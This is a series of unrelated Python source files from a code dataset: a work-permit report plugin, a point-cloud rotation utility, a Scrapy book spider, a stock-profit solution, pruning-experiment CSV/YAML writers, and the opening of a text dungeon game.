personal_protective_equipment_required\n datasets[self._PERSONAL_PROTECTIVE_EQUIPMENT_REQUIRED_FIELDS_DATASET] = self.get_personal_protective_equipment_required_fields_dataset(permit_logid, snapshot, self._PERSONAL_PROTECTIVE_EQUIPMENT_REQUIRED_FIELDS_DATASET, sa_session)\n # gas_measurement_results\n datasets[self._GAS_MEASUREMENT_RESULTS_FIELDS_DATASET] = self.get_gas_measurement_results_fields_dataset(permit_logid, snapshot, self._GAS_MEASUREMENT_RESULTS_FIELDS_DATASET, sa_session)\n # approval_non_flamable\n datasets[self._APPROVAL_NON_FLAMABLE_FIELDS_DATASET] = self.get_approval_non_flamable_fields_dataset(permit_logid, snapshot, self._APPROVAL_NON_FLAMABLE_FIELDS_DATASET, sa_session)\n # approval_flamable\n datasets[self._APPROVAL_FLAMABLE_FIELDS_DATASET] = self.get_approval_flamable_fields_dataset(permit_logid, snapshot, self._APPROVAL_FLAMABLE_FIELDS_DATASET, sa_session)\n # communicate_with_requestor\n datasets[self._COMMUNICATE_WITH_REQUESTOR_FIELDS_DATASET] = self.get_communicate_with_requestor_fields_dataset(permit_logid, snapshot, self._COMMUNICATE_WITH_REQUESTOR_FIELDS_DATASET, sa_session)\n # gas_detection\n datasets[self._GAS_DETECTION_FIELDS_DATASET] = self.get_gas_detection_fields_dataset(permit_logid, snapshot, self._GAS_DETECTION_FIELDS_DATASET, sa_session)\n # work_permit_renewal\n datasets[self._WORK_PERMIT_RENEWAL_FIELDS_DATASET] = self.get_work_permit_renewal_fields_dataset(permit_logid, snapshot, self._WORK_PERMIT_RENEWAL_FIELDS_DATASET, sa_session)\n # close_work_permit\n datasets[self._CLOSE_WORK_PERMIT_FIELDS_DATASET] = self.get_close_work_permit_fields_dataset(permit_logid, snapshot, self._CLOSE_WORK_PERMIT_FIELDS_DATASET, sa_session)\n return datasets\n\n def get_special_field_value(self, permit_logid, field_name, display_name, value, dataset, industraform_values, snapshot, sa_session):\n value = super(HotWorkDataSet, self).get_special_field_value(permit_logid, field_name, display_name, value, dataset, industraform_values, snapshot, sa_session)\n if field_name == 'area_hierarchy':\n value = self.get_area_hierarchy_value(value)\n return value\n\n @staticmethod\n def get_area_hierarchy_value(area_list_str):\n if not area_list_str:\n return\n # value = area_list_str.replace(\"u'\", \"\").replace(\"'\", \"\").strip(\"[\").strip(\"]\")\n value = area_list_str.replace(\"u'\", \"\").replace(\"'\", \" \").replace(\",\", \" > \").strip(\"[\").strip(\"]\")\n return value\n\n def get_permit_heading_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_permit_datetime_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session, use_display_value=False)\n return dataset\n\n # def get_permit_signature_and_name_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n # section4_user, section4_signature = self.get_full_name_and_signature(snapshot, self._SECTION_4_TITLE, sa_session)\n # section5_user, section5_signature = self.get_full_name_and_signature(snapshot, self._SECTION_5_TITLE, sa_session)\n # section6_user, section6_signature = self.get_full_name_and_signature(snapshot, self._SECTION_6_TITLE, sa_session)\n # section11_user, section11_signature = self.get_full_name_and_signature(snapshot, self._SECTION_11_TITLE, sa_session)\n # section12_user, section12_signature = self.get_full_name_and_signature(snapshot, self._SECTION_12_TITLE, sa_session)\n #\n # dataset = self.get_header_row(dataset)\n # colum_values = [section4_user or section5_user,\n # section4_signature or section5_signature,\n # section6_user,\n # section6_signature,\n # section11_user or section12_user,\n # section11_signature or section12_signature\n # ]\n # dataset.append(colum_values)\n # return dataset\n\n\n def get_permit_signature_and_name_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n section1_user, section1_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_1_TITLE, sa_session)\n section2_user, section2_datetime = self.get_section_approvals_user(snapshot, self._SECTION_1_TITLE, sa_session)\n section3_user, section3_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_3_TITLE, sa_session)\n section4_user, section4_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_4_TITLE, sa_session)\n section5_user, section5_datetime = self.get_section_approvals_user(snapshot, self._SECTION_5_TITLE, sa_session)\n section6_user, section6_datetime = self.get_section_approvals_user(snapshot, self._SECTION_6_TITLE, sa_session)\n section7_user, section7_datetime = self.get_section_approvals_user(snapshot, self._SECTION_7_TITLE, sa_session)\n section8_user, section8_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_8_TITLE, sa_session)\n section9_user, section9_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_9_TITLE, sa_session)\n section10_user, section10_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_10_TITLE, sa_session)\n section11_user, section11_datetime = self.get_full_name_and_datetime(snapshot, self._SECTION_11_TITLE, sa_session)\n section12_user, section12_datetime = self.get_section_approvals_user(snapshot, self._SECTION_12_TITLE, sa_session)\n section13_user, section13_datetime = self.get_section_approvals_user(snapshot, self._SECTION_13_TITLE, sa_session)\n section14_user, section14_datetime = self.get_section_approvals_user(snapshot, self._SECTION_14_TITLE, sa_session)\n section15_user, section15_datetime = self.get_section_approvals_user(snapshot, self._SECTION_15_TITLE, sa_session)\n\n dataset = self.get_header_row(dataset)\n colum_values = [section1_user,\n section1_datetime,\n section2_user,\n section2_datetime,\n section3_user,\n section3_datetime,\n section4_user,\n section4_datetime,\n section5_user,\n section5_datetime,\n section6_user or section7_user,\n section6_datetime or section7_datetime,\n section7_user or section6_user,\n section7_datetime or section6_datetime,\n section8_user,\n section8_datetime,\n section9_user,\n section9_datetime,\n section10_user,\n section10_datetime,\n section11_user,\n section11_datetime,\n section12_user,\n section12_datetime,\n section13_user,\n section13_datetime,\n section14_user,\n section14_datetime,\n section15_user,\n section15_datetime\n ]\n dataset.append(colum_values)\n return dataset\n\n\n\n\n def get_certificate_fields_dataset(self, certificate_logid, snapshot, dataset, sa_session):\n certificates = self.get_linked_certificates(certificate_logid, sa_session)\n dataset = self.get_header_row(dataset)\n column_values = [\n certificates.get('confined_space_certificate_no', ''),\n certificates.get('crane_lifting_certificate_no', ''),\n certificates.get('excavation_certificate_no', ''),\n certificates.get('box_up_certificate_no', ''),\n certificates.get('radiography_certificate_no', ''),\n certificates.get('diving_certificate_no', ''),\n certificates.get('scaffolding_certificate_no', ''),\n certificates.get('road_close_certificate_no', ''),\n certificates.get('nearby_high_voltage_certificate_no', '')\n ]\n dataset.append(column_values)\n return dataset\n\n def get_other_relevant_documents_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_safety_requirements_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_personal_protective_equipment_required_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_gas_measurement_results_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_approval_non_flamable_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_approval_flamable_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_communicate_with_requestor_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_gas_detection_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_work_permit_renewal_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n def get_close_work_permit_fields_dataset(self, permit_logid, snapshot, dataset, sa_session):\n dataset = self.get_dataset_field_values(permit_logid, snapshot, dataset, sa_session)\n return dataset\n\n\nPlugin = HotWorkDataSet\n","sub_path":"PermitToWork/DataSets/HotWorkDataSet.py","file_name":"HotWorkDataSet.py","file_ext":"py","file_size_in_byte":40369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111826732","text":"import numpy as np\nfrom ply_file_internal import PlyData, PlyElement\n\ndef rand_rotation_matrix(deflection=1.0, seed=None):\n '''Creates a random rotation matrix.\n\n deflection: the magnitude of the rotation. For 0, no rotation; for 1, completely random\n rotation. Small deflection => small perturbation.\n\n DOI: http://www.realtimerendering.com/resources/GraphicsGems/gemsiii/rand_rotation.c\n http://blog.lostinmyterminal.com/python/2015/05/12/random-rotation-matrix.html\n '''\n if seed is not None:\n np.random.seed(seed)\n\n randnums = np.random.uniform(size=(3,))\n\n theta, phi, z = randnums\n\n theta = theta * 2.0 * deflection * np.pi # Rotation about the pole (Z).\n phi = phi * 2.0 * np.pi # For direction of pole deflection.\n z = z * 2.0 * deflection # For magnitude of pole deflection.\n\n # Compute a vector V used for distributing points over the sphere\n # via the reflection I - V Transpose(V). This formulation of V\n # will guarantee that if x[1] and x[2] are uniformly distributed,\n # the reflected points will be uniform on the sphere. Note that V\n # has length sqrt(2) to eliminate the 2 in the Householder matrix.\n\n r = np.sqrt(z)\n V = (\n np.sin(phi) * r,\n np.cos(phi) * r,\n np.sqrt(2.0 - z))\n\n st = np.sin(theta)\n ct = np.cos(theta)\n\n R = np.array(((ct, st, 0), (-st, ct, 0), (0, 0, 1)))\n\n # Construct the rotation matrix ( V Transpose(V) - I ) R.\n M = (np.outer(V, V) - np.eye(3)).dot(R)\n return M\n\nif __name__ == '__main__':\n def read_ply(filename):\n \"\"\" read XYZ point cloud from filename PLY file \"\"\"\n plydata = PlyData.read(filename)\n pc = plydata['vertex'].data\n pc_array = np.array([[x, y, z] for x,y,z in pc])\n return pc_array\n\n def write_ply(points, filename, text=True):\n \"\"\" input: Nx3, write points to filename as PLY format. \"\"\"\n points = [(points[i,0], points[i,1], points[i,2]) for i in range(points.shape[0])]\n vertex = np.array(points, dtype=[('x', 'f4'), ('y', 'f4'),('z', 'f4')])\n el = PlyElement.describe(vertex, 'vertex', comments=['vertices'])\n PlyData([el], text=text).write(filename)\n # data in\n filename = 'printer_3d'\n pc_in = read_ply(filename + '.ply')\n pc_in = np.reshape(pc_in, (1,-1,3))\n # rotate\n r_rotation = rand_rotation_matrix()\n print(r_rotation)\n # data out\n pc_out = pc_in.dot(r_rotation)\n write_ply(pc_out[0], 'rot_' + filename + '.ply')\n # check radius\n v1 = np.sqrt(pc_out[0][:,0]*pc_out[0][:,0] + pc_out[0][:,1]*pc_out[0][:,1] + pc_out[0][:,2]*pc_out[0][:,2])\n v2 = np.sqrt(pc_in[0][:,0]*pc_in[0][:,0] + pc_in[0][:,1]*pc_in[0][:,1] + pc_in[0][:,2]*pc_in[0][:,2])\n print(v1 - v2)\n","sub_path":"src/general_utils.py","file_name":"general_utils.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"393060275","text":"import scrapy\nfrom ..items import BookItem\nfrom scrapy.linkextractors import LinkExtractor\n\nclass BooksSpider(scrapy.Spider):\n # 每个爬虫的唯一标识,采用类属性\n name = \"books\"\n\n # 定义爬虫的起始点,起始点可以是多个,这里只有一个\n start_urls = [\"http://books.toscrape.com/\"]\n\n # 实现start_requests方法\n def start_requests(self):\n yield scrapy.Request(\"http://books.toscrape.com\",\n callback=self.parse,\n headers={\"User-Agent\":\"Mozilla/5.0\"},\n dont_filter=True)\n\n # def parse(self, response):\n # # 提取数据\n # # 每一本书的信息在
中\n # # 我们使用css()方法找到所有这样的article元素,并以此迭代\n # for book in response.css(\"article.product_pod\"):\n # # 书名信息在article>h3>a元素的title属性中\n # # 例如A Light in the ...\n # name = book.xpath(\"./h3/a/@title\").extract_first()\n # # 书价信息在

元素的文本中,\n # # 如:

51.77

\n # price = book.css('p.price_color::text').extract_first()\n # yield {\n # \"name\" : name,\n # \"price\" : price,\n # }\n #\n # # 提取链接\n # # 下一页的url在ul.pager>li.next>a元素中\n # # 例如
  • next
  • \n # next_url = response.css(\"ul.pager li.next a::attr(href)\").extract_first()\n # if next_url:\n # # 如果找到下一页的url,得到绝对路径,构建新的Request对象\n # next_url = response.urljoin(next_url)\n # yield scrapy.Request(next_url, callback=self.parse)\n\n def parse(self, response):\n # 提取数据\n # 每一本书的信息在
    中\n # 我们使用css()方法找到所有这样的article元素,并以此迭代\n for sel in response.css(\"article.product_pod\"):\n book = BookItem()\n # 书名信息在article>h3>a元素的title属性中\n # 例如A Light in the ...\n book['name'] = sel.xpath(\"./h3/a/@title\").extract_first()\n # 书价信息在

    元素的文本中,\n # 如:

    51.77

    \n book['price'] = sel.css('p.price_color::text').extract_first()\n yield book\n\n # # 提取链接\n # # 下一页的url在ul.pager>li.next>a元素中\n # # 例如
  • next
  • \n # next_url = response.css(\"ul.pager li.next a::attr(href)\").extract_first()\n # if next_url:\n # # 如果找到下一页的url���得到绝对路径,构建新的Request对象\n # next_url = response.urljoin(next_url)\n # yield scrapy.Request(next_url, callback=self.parse)\n\n # 传递给restrict_css参数一个CSS选择器表达式\n # 描述出下一个页链接所在的区域(在li.next下)\n le = LinkExtractor(restrict_css='ul.pager li.next')\n # 传入一个Response对象,该方法根据创建对象时所描述的提取规则\n # 在Response对象所包含的页面中提取链接,最终返回一个列表\n # 其中每个元素都是一个Link对象,即提取到的一个链接\n links = le.extract_links(response)\n if links:\n # 由于页面中的下一页链接只有一个,因此用link[0]获取Link对象\n # Link对象的url属性便是链接页面的绝对url地址(无需再调用response.urljoin方法)\n # 用其构造Request对象并提交\n next_url = links[0].url\n yield scrapy.Request(next_url, callback=self.parse)\n","sub_path":"example/spiders/book_spider.py","file_name":"book_spider.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"373213433","text":"class Solution:\n\n def maxProfit(self, prices:list):\n\n length = len(prices)\n dp_0 = 0\n dp_1 = float('-inf')\n for i in range(length):\n dp_0 = max(dp_0, dp_1 + prices[i])\n dp_1 = max(dp_1, - prices[i])\n\n return dp_0\n\n","sub_path":"动态规划/121. 买卖股票的最佳时机.py","file_name":"121. 买卖股票的最佳时机.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563127050","text":"import csv\nfrom datetime import datetime\nfrom typing import List\n\nimport pandas as pd\nimport torch\nimport yaml\nfrom IPython.core.display import display\n\nfrom LTH_for_Rational_ResNets import Mask\nfrom LTH_for_Rational_ResNets import argparser\n\nargs = argparser.get_arguments()\n\n\ndef make_csv(model, prune_percent: List[float], test_acc: List[float]):\n \"\"\"\n Save results of LTH experiments as csv files.\n\n Parameters\n ----------\n model\n prune_percent: List[float]\n A list with the percentage of weights that where pruned.\n test_acc: List[float]\n A list with the test accuracies of all pruning epochs.\n\n Returns\n -------\n PATH: str\n The path to the saved csv file.\n \"\"\"\n time_stamp = datetime.now()\n PATH = 'CSV/{}'.format(model) + '/{}'.format(time_stamp) + '.csv'\n with open(PATH, 'w', newline='') as csvfile:\n fieldnames = ['Percentage of Weights pruned', 'Test Accuracy']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, dialect='excel')\n\n writer.writeheader()\n for i in range(len(prune_percent)):\n writer.writerow({'Percentage of Weights pruned': prune_percent[i], 'Test Accuracy': test_acc[i]})\n\n make_all_results_csv(model, prune_percent, test_acc)\n return PATH\n\n\ndef make_all_results_csv(model, prune_percent: List[float], test_acc: List[float]):\n if args.prune_shortcuts:\n PATH = 'CSV/{}/'.format(model) + 'test_accs_shortcuts.csv'\n else:\n PATH = 'CSV/{}/'.format(model) + 'test_accs.csv'\n with open(PATH, 'a') as csvfile:\n fieldnames = ['pruning_percentage', 'test_acc']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, dialect='excel')\n for i in range(len(prune_percent)):\n writer.writerow({'pruning_percentage': prune_percent[i], 'test_acc': test_acc[i]})\n\n\ndef make_mask_csv(original_model, all_PATHS: List[str], model_names: List[str]):\n \"\"\"\n Visualize the masks resulting from the LTH experiments.\n\n Parameters\n ----------\n original_model:\n Model that is not pruned for comparison.\n all_PATHS: List[str]\n A list with the paths to the last saved checkpoints.\n model_names: List[str]\n\n Returns\n -------\n PATH_dim: str\n Path to the csv file which shows the reduction of the convolutional layers dimensions.\n PATH_weights: str\n Path to the csv file which shows the absolute number of pruned weights.\n PATH_percent: str\n Path to the csv file which shows the relative number of pruned weights in percent.\n \"\"\"\n time_stamp = datetime.now()\n args = argparser.get_arguments()\n\n original_mask: Mask\n original_mask = Mask.make_initial_mask(original_model)\n\n masks = [original_mask]\n for p in range(len(all_PATHS)):\n PATH = all_PATHS[p]\n checkpoint = torch.load(PATH)\n mask = checkpoint['mask']\n masks.append(mask)\n\n all_data_dim = []\n all_data_weights = []\n all_data_percent = []\n control_weights = []\n num_original = 0\n\n for m in range(len(masks)):\n mask = masks[m]\n data_dim = []\n data_weights = []\n data_percent = []\n total_weights = 0\n j = 0\n for key, values in mask.items():\n print(key)\n x = torch.nonzero(values)\n num_weights = len(x) - 2\n total_weights += num_weights\n data_weights.append(num_weights)\n\n if m == 0:\n control_weights.append(num_weights)\n else:\n data_percent.append((num_weights * 100) / control_weights[j])\n print((num_weights * 100) / control_weights[j])\n j += 1\n\n x_indices = []\n x_counter = 0\n\n y_indices = []\n y_counter = 0\n for i in range(x.shape[0]):\n x_i = x[i][0]\n y_i = x[i][1]\n\n if x_i not in x_indices:\n x_indices.append(x_i)\n x_counter += 1\n\n if y_i not in y_indices:\n y_indices.append(y_i)\n y_counter += 1\n x_y_data = [x_counter, y_counter]\n data_dim.append(x_y_data)\n print('x: ', x_counter)\n print('y: ', y_counter)\n\n if m == 0:\n num_original = total_weights\n total_percent = (total_weights * 100) / num_original\n data_weights.append(total_weights)\n data_weights.append(total_percent)\n all_data_dim.append(data_dim)\n all_data_weights.append(data_weights)\n if m != 0:\n all_data_percent.append(data_percent)\n\n if args.arch_for_run_all == 'CIFAR10':\n tuples, tuples_weights = csv_cifar_models(original_model)\n else:\n tuples, tuples_weights = csv_imagenet_models(original_model)\n index = pd.MultiIndex.from_tuples(tuples)\n index_weights = pd.MultiIndex.from_tuples(tuples_weights)\n df_dim = pd.DataFrame(all_data_dim, index=['Original Model'] + model_names, columns=index)\n df_weights = pd.DataFrame(all_data_weights, index=['Original Model'] + model_names, columns=index_weights)\n df_percent = pd.DataFrame(all_data_percent, index=model_names, columns=index)\n\n display(df_dim)\n display(df_weights)\n display(df_percent)\n PATH_dim = './CSV/Masks/{}'.format(time_stamp) + '_dim' + '.csv'\n PATH_weights = './CSV/Masks/{}'.format(time_stamp) + '_weights' + '.csv'\n PATH_percent = './CSV/Masks/{}'.format(time_stamp) + '_percent' + '.csv'\n df_dim.to_csv(PATH_dim, index=True)\n df_weights.to_csv(PATH_weights, index=True)\n df_percent.to_csv(PATH_percent, index=True)\n\n return PATH_dim, PATH_weights, PATH_percent\n\n\ndef csv_imagenet_models(model):\n \"\"\"\n Visualize masks for ImageNet models.\n\n Parameters\n ----------\n model\n\n Returns\n -------\n tuples: List[Tuple[str]]\n Tuples for the data frame.\n \"\"\"\n args = argparser.get_arguments()\n prune_shortcuts = args.prune_shortcuts\n\n num_layers = len(model.layers)\n\n array_0 = []\n array_1 = []\n array_2 = []\n array_3_conv_1 = ['conv. 0', 'conv. 1', 'conv. 2'] + ['conv. 0', 'conv. 1']\n\n if prune_shortcuts:\n if num_layers == 1:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 2\n\n elif num_layers == 4:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3 + ['Layer 2'] + [''] * 4 + ['Layer 3'] + [''] * 4 + ['Layer 4'] + [''] * 4\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] + ['BasicBlock 0', '', '', 'BasicBlock 1', ''] * 3\n array_2 = ['conv 0'] + ['conv. 0', 'conv. 1'] * 2 + array_3_conv_1 * 3\n\n elif num_layers == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3 + ['Layer 2'] + [''] * 4\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] + ['BasicBlock 0', '', 'BasicBlock 1', '', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 2 + array_3_conv_1\n\n else:\n if num_layers == 1:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 2\n\n elif num_layers == 4:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3 + ['Layer 2'] + [''] * 3 + ['Layer 3'] + [''] * 3 + ['Layer 4'] + [''] * 3\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] * 4\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 8\n\n elif num_layers == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3 + ['Layer 2'] + [''] * 3\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] * 2\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 4\n arrays = [array_0, array_1, array_2]\n arrays_weights = [array_0 + [''] * 2, array_1 + ['Total weights'] + ['Remained in %'], array_2 + [''] * 2]\n tuples = list(zip(*arrays))\n tuples_weights = list(zip(*arrays_weights))\n\n return tuples, tuples_weights\n\n\ndef csv_cifar_models(model):\n \"\"\"\n Visualize masks for cifar models.\n\n Parameters\n ----------\n model\n\n Returns\n -------\n tuples: List[Tuple[str]]\n Tuples for the data frame.\n \"\"\"\n num_layers = len(model.layers)\n args = argparser.get_arguments()\n prune_shortcuts = args.prune_shortcuts\n array_0 = []\n array_1 = []\n array_2 = []\n array_3_conv = ['conv. 0', 'conv. 1', 'conv. 2'] + ['conv. 0', 'conv. 1'] * 2\n array_3_conv_1 = ['conv. 0', 'conv. 1', 'conv. 2'] + ['conv. 0', 'conv. 1']\n\n if prune_shortcuts:\n if num_layers == 1:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 3\n num_bb = 0\n else:\n num_bb = model.layers[1]\n\n if num_layers == 3:\n if num_bb == 3:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5 + ['Layer 2'] + [''] * 6 + ['Layer 3'] + [''] * 6\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', ''] + ['BasicBlock 0', '', '', 'BasicBlock 1', '', 'BasicBlock 2', ''] * 2\n array_2 = ['conv 0'] + ['conv. 0', 'conv. 1'] * 3 + array_3_conv * 2\n elif num_bb == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 4 + ['Layer 2'] + [''] * 4 + ['Layer 3'] + [''] * 4\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] + ['BasicBlock 0', '', '', 'BasicBlock 1', ''] * 2\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 2 + array_3_conv_1 * 2\n\n elif num_layers == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5 + ['Layer 2'] + [''] * 6\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', ''] + ['BasicBlock 0', '', '', 'BasicBlock 1', '', 'BasicBlock 2', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 3 + array_3_conv\n\n else:\n if num_layers == 1:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', '']\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 3\n num_bb = 0\n else:\n num_bb = model.layers[1]\n if num_layers == 3:\n if num_bb == 3:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5 + ['Layer 2'] + [''] * 5 + ['Layer 3'] + [''] * 5\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', ''] * 3\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 9\n elif num_bb == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 3 + ['Layer 2'] + [''] * 3 + ['Layer 3'] + [''] * 3\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', ''] * 3\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 6\n\n if num_layers == 2:\n array_0 = ['Layer 0'] + ['Layer 1'] + [''] * 5 + ['Layer 2'] + [''] * 5\n array_1 = [''] + ['BasicBlock 0', '', 'BasicBlock 1', '', 'BasicBlock 2', ''] * 2\n array_2 = ['conv. 0'] + ['conv. 0', 'conv. 1'] * 6\n arrays = [array_0, array_1, array_2]\n arrays_weights = [array_0 + [''] * 2, array_1 + ['Total weights'] + ['Remained in %'], array_2 + [''] * 2]\n tuples = list(zip(*arrays))\n tuples_weights = list(zip(*arrays_weights))\n return tuples, tuples_weights\n\n\ndef make_yaml(models: List[str], saved_models: List[str], print_log: str, table: List[str] = None, csv: List[str] = None, plot: List[str] = None):\n \"\"\"\n Make YAML file for experiment (series).\n\n Parameters\n ----------\n models: List[str]\n A list with the model name(s).\n saved_models: List[str]\n A list with the path(s) to the directory with the saved models.\n print_log: str\n The path to the print log.\n table: List[str]\n The paths to the three different mask tables.\n csv: List[str]\n The path(s) to the csv file(s).\n plot: List[str]\n The path(s) to the plot(s).\n \"\"\"\n LTH_args = argparser.get_arguments()\n time_stamp = datetime.now()\n yaml_data = [{'Date': [time_stamp]}, {'Model(s)': models}, {'Dataset': [LTH_args.dataset]}, {'Batch Size': [LTH_args.batch_size]}, {'Pruning Percentage per Epoch': [LTH_args.pruning_percentage]},\n {'Training Epochs per Pruning Epoch': [LTH_args.training_number_of_epochs]}, {'Learning Rate': [LTH_args.learning_rate]}, {'Warm-Up Iterations': [LTH_args.warmup_iterations]}, {'Training Milestones': [LTH_args.milestones]},\n {'Shortcuts pruned': [LTH_args.prune_shortcuts]}, {'Rational Inits': [LTH_args.initialize_rationals]}, {'Data Seed': [LTH_args.data_seeds]}, {'Saved Models': [saved_models]}, {'Print Log': [print_log]}, {'Testset augmented': [False]}]\n\n if LTH_args.stop_criteria is 'num_prune_epochs':\n yaml_data.append({'Iterative Pruning Epochs': [LTH_args.iterative_pruning_epochs]})\n elif LTH_args.stop_criteria is 'test_acc':\n yaml_data.append({'Test Accuracy Threshold': [LTH_args.test_accuracy_threshold]})\n\n if LTH_args.save_res_csv:\n yaml_data.append({'CSV File': [csv]})\n\n if table is not None:\n yaml_data.append({'Mask CSV File': [table]})\n\n if plot is not None:\n yaml_data.append({'Plot': [plot]})\n\n PATH = 'YAML/{}'.format(time_stamp) + '.yaml'\n with open(PATH, 'w') as file:\n documents = yaml.dump(yaml_data, file)\n","sub_path":"LTH_for_Rational_ResNets/LTH_write_read_csv.py","file_name":"LTH_write_read_csv.py","file_ext":"py","file_size_in_byte":13869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"501128724","text":"import random, time\nimport os\nimport outside_dungeon\n\nrandom.seed(time.time())\n\n###############################################################################\n# All ASCII art used in this file was pulled from the below site: #\n# -> http://patorjk.com/software/taag/#p=display&f=Ivrit&t=Zootopia%0A #\n# %0AArendelle%0A%0ACave%20of%20Wonders%0ANeverland%0AToontown #\n# %0APixie%20Hollow%0AThe%20Southern%20Isles%0AWonderland #\n# %0AParadise%20Falls%0AEnchanted%20Forest #\n###############################################################################\n\ndef show_menu():\n \"\"\"Shows the dungeon's menu\"\"\"\n menu = \"\"\"\n Dungeon Menu:\n Show Items in Loot Bag...................... L or l\n Show Your Health Status..................... H or h\n Show Zombie Health Status................... Z or z\n Attack Zombies.............................. A or a\n Display Room Menu........................... M or m\n Quit the Room............................... Q or q\n \"\"\"\n print(menu)\n\ndef show_fight_menu():\n \"\"\"Shows the fight menu to allow the user to make choices\n during the battle\"\"\"\n menu = \"\"\"\n Fight Menu:\n Show Your Health Status..................... H or h\n Show Zombie Health Status................... Z or z\n Throw a Punch............................... A or a\n Display Fight Menu.......................... M or m\n Run away.................................... Q or q\n \"\"\"\n print(menu)\n\ndef show_zombie_stats(zombies):\n \"\"\"Allows the hero to view the health stats of all zombies in\n a dungeon at one time\"\"\"\n for num in range(0, len(zombies)):\n if (zombies[num].health == 1):\n print(\"Zombie\", num + 1, \"needs only 1 hit before it dies.\")\n else:\n print(\"Zombie\", num + 1, \"needs\", zombies[num].health,\n \"hits before it dies.\")\n\ndef show_lives_remaining(player):\n \"\"\"Allows the hero to view his and the zombie's health stats\n during a battle and includes pretty pictures\"\"\"\n print(\"☺ \" * player.health)\n print(player.health, \"lives remaining!\")\n\ndef 